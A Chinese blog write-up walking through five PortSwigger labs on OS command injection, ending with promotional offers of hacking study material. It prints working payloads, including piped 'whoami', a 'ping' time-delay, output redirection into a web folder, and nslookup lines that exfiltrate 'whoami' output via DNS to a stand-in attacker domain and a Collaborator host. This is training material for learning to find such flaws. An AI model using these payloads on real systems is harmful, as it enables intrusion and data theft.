burp靶场–操作系统命令注入

https://portswigger.net/web-security/os-command-injection#what-is-os-command-injection

1.操作系统命令注入:
操作系统命令注入也称为 shell 注入。它允许攻击者在运行应用程序的服务器上执行操作系统 (OS) 命令,通常会完全破坏应用程序及其数据。通常,攻击者可以利用操作系统命令注入漏洞来危害托管基础设施的其他部分,并利用信任关系将攻击转向组织内的其他系统。

实验1:操作系统命令注入,简单案例
### 使用要求:
该实验室的产品库存检查器中 存在操作系统命令注入漏洞。
应用程序执行包含用户提供的产品和商店 ID 的 shell 命令,并在响应中返回命令的原始输出。
要解决本实验,请执行whoami命令以确定当前用户的名称。

### 实验操作:
使用 Burp Suite 拦截并修改检查库存水平的请求。
修改storeID参数,为其指定值1|whoami。
请注意,响应包含当前用户的名称。

在这里插入图片描述

实验2:带时间延迟的操作系统盲命令注入
### 实验要求:
该实验室在反馈功能中 包含操作系统盲命令注入漏洞。
应用程序执行包含用户提供的详细信息的 shell 命令。命令的输出不会在响应中返回。
为了解决这个实验室问题,利用操作系统盲命令注入漏洞造成 10 秒的延迟。

### 实验操作:
使用Burp Suite拦截并修改提交反馈的请求。
修改email参数,改为:
email=x||ping+-c+10+127.0.0.1||
请注意,响应需要 10 秒才能返回。

在这里插入图片描述

实验3:具有输出重定向的盲操作系统命令注入
### 实验要求:
该实验室在反馈功能中 包含操作系统盲命令注入漏洞。
应用程序执行包含用户提供的详细信息的 shell 命令。命令的输出不会在响应中返回。但是,您可以使用输出重定向来捕获命令的输出。有一个可写文件夹:
/var/www/images/
应用程序从此位置提供产品目录的图像。您可以将注入命令的输出重定向到此文件夹中的文件,然后使用图像加载 URL 检索文件的内容。
要解决该实验,请执行whoami命令并检索输出。

### 实验操作:
使用Burp Suite拦截并修改提交反馈的请求。
修改email参数,改为:
email=||whoami>/var/www/images/output.txt||
现在使用 Burp Suite 拦截并修改加载产品图像的请求。
修改filename参数,将值更改为您为注入命令的输出指定的文件的名称:
filename=output.txt
观察响应包含注入命令的输出。

在这里插入图片描述
使用proxy开启拦截:一步一步找到查看图像的包:
在这里插入图片描述
查看命令输出结果:
在这里插入图片描述

实验4:带外交互的盲操作系统命令注入
### 实验要求:
该实验室在反馈功能中 包含操作系统盲命令注入漏洞。
应用程序执行包含用户提供的详细信息的 shell 命令。该命令是异步执行的,对应用程序的响应没有影响。无法将输出重定向到您可以访问的位置。但是,您可以触发与外部域的带外交互。
要解决该实验室问题,请利用操作系统盲命令注入漏洞向 Burp Collaborator 发出 DNS 查找。

### 实验操作:
使用Burp Suite拦截并修改提交反馈的请求。
修改email参数,改为:
email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||
右键单击并选择“插入 Collaborator 负载”以在修改的email参数中指示的位置插入 Burp Collaborator 子域。

###
5、利用带外(OAST)技术
1、简述:

可以使用一个注入命令,该命令将触发与您使用OAST技术控制的系统的带外网络交互。例如:

& nslookup kgji2ohoyw.web-attacker.com &
此有效负载使用nslookup命令对指定的域进行DNS查找。攻击者可以监视指定查找的发生,从而检测到命令已成功插入。 

2、带外通道还提供了一种从注入命令中提取输出的简单方法:

& nslookup `whoami`.kgji2ohoyw.web-attacker.com &
这将导致对攻击者的域进行DNS查找,该域包含whoami命令:

wwwuser.kgji2ohoyw.web-attacker.com

###############
##
payload:email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||
collaborator生成:zil6so7cbkpvszmjvnkp0v2v3m9dx3ls.oastify.com

email=x||nslookup+`whoami`.zil6so7cbkpvszmjvnkp0v2v3m9dx3ls.oastify.com||

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

实验5:带外数据泄露的盲操作系统命令注入
### 实验要求:
该实验室在反馈功能中 包含操作系统盲命令注入漏洞。
应用程序执行包含用户提供的详细信息的 shell 命令。该命令是异步执行的,对应用程序的响应没有影响。无法将输出重定向到您可以访问的位置。但是,您可以触发与外部域的带外交互。
要完成该实验,请执行whoami命令并通过 DNS 查询将输出渗透到 Burp Collaborator。您需要输入当前用户的名称才能完成实验。

### 实验操作:
使用Burp Suite Professional拦截并修改提交反馈的请求。
转到“协作者”选项卡。
单击“复制到剪贴板”将唯一的 Burp Collaborator 负载复制到剪贴板。
修改email参数,将其更改为如下所示,但在指示的位置插入您的 Burp Collaborator 子域:
email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||
email=||nslookup+`whoami`.BURP-COLLABORATOR-SUBDOMAIN||
返回“协作者”选项卡,然后单击“立即投票”。您应该会看到一些由应用程序发起的作为负载结果的 DNS 交互。如果您没有看到列出的任何交互,请等待几秒钟然后重试,因为服务器端命令是异步执行的。
请注意,命令的输出出现在交互的子域中,您可以在“协作者”选项卡中查看该输出。所查找的完整域名显示在交互的“描述”选项卡中。
要完成实验,请输入当前用户的名称。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

参考:
### 【Burp系列】超全命令执行漏洞实验总结
https://mp.weixin.qq.com/s/CFy93BOGOfh_6Qb5yL6M6w
### payloadallthethings:
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
### owasp命令执行:
https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection


最后

关于网络安全技术储备

学好网络安全不论是就业还是做副业赚钱都不错,但要学会网络安全还是要有一个学习规划。最后大家分享一份全套的网络安全学习资料,给那些想学习网络安全的小伙伴们一点帮助!

对于0基础小白入门:

如果你是零基础小白,想快速入门网络安全是可以考虑的。

一方面是学习时间相对较短,学习内容更全面更集中。

二方面是可以找到适合自己的学习方案

包括:网安成长学习路线图、SRC&黑客文档、护网行动、黑客必读书单、面试题、学习视频等教程。带你从零基础系统性的学好网络安全!

需要的可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费

img

👉1.成长路线图&学习规划👈
要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费。

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

在这里插入图片描述

👉2.网安入门到进阶视频教程👈
很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。(全套教程文末领取哈)

在这里插入图片描述

👉3.SRC&黑客文档👈
大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:

在这里插入图片描述

黑客资料由于是敏感资源,这里不能直接展示哦!(全套教程文末领取哈)

👉4.护网行动资料👈
其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!

在这里插入图片描述

👉5.黑客必读书单👈

随着互联网技术的飞速发展,网络安全已经成为了当今科技领域的一大热点。这些SQL注入、CCNA、Web渗透、Linux服务器等,以其强大的语言理解和防御能力,正在守护着我们网络世界。 那以下这些PDF籍就是非常不错的学习资源。

img

👉6.网络安全岗面试题合集👈
当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。

在这里插入图片描述

这份完整版的网络安全学习资料已经上传CSDN,朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】

img

Logo

openEuler 是由开放原子开源基金会孵化的全场景开源操作系统项目,面向数字基础设施四大核心场景(服务器、云计算、边缘计算、嵌入式),全面支持 ARM、x86、RISC-V、loongArch、PowerPC、SW-64 等多样性计算架构

更多推荐